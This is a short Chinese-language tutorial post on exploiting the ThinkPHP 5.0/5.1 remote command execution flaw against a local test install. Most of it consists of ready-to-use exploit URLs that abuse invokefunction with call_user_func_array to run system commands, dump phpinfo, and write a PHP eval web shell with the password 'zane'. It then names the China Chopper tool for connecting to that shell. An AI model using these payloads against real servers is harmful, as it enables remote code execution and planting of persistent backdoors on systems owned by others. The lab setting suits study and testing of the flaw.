關于ThinkPHP漏洞利用

下面由thinkphp框架教程欄目給大家介紹thinkphp 漏洞利用,希望對需要的朋友有所幫助!

關于ThinkPHP漏洞利用

thinkphp_5x_命令執行漏洞

受影響版本包括5.0和5.1版本

docker漏洞環境源碼:
https://github.com/vulnspy/thinkphp-5.1.29
本地環境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函數遠程命令執行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

立即學習PHP免費學習筆記(深入)”;

通過phpinfo函數寫出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

寫入shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/thinkapp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=echo?^<?php  @eval($_POST["zane"])?^>&gt;shell.php  或者  http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/thinkapp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=file_put_contents&amp;vars[1][]=../test.php&amp;vars[1][]=FUCK<?php  @eval($_POST["zane"])?>

使用菜刀連接
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php ? 密碼為zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php ? ? ? ?密碼為zane
`

? 版權聲明
THE END
喜歡就支持一下吧
點贊14 分享